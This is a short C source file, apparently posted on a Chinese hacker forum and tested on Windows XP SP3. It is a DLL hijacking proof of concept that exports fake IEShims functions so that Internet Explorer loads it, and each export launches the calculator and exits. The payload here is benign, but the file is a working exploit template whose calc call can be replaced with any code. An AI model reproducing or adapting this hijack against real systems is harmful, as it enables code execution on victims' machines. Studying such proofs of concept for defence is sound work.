测试环境 xp sp3kqJ骇客吧

 
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
 
DLLIMPORT void IEShims_GetOriginatingThreadId() { MantyCore(); }
DLLIMPORT void IEShims_InDllMainContext() { MantyCore(); }
DLLIMPORT void IEShims_Initialize() { MantyCore(); }
DLLIMPORT void IEShims_SetRedirectRegistryForThread() { MantyCore(); }
DLLIMPORT void IEShims_Uninitialize() { MantyCore(); }
 
int MantyCore()
{
WinExec("calc", 0);
exit(0);
return 0;
}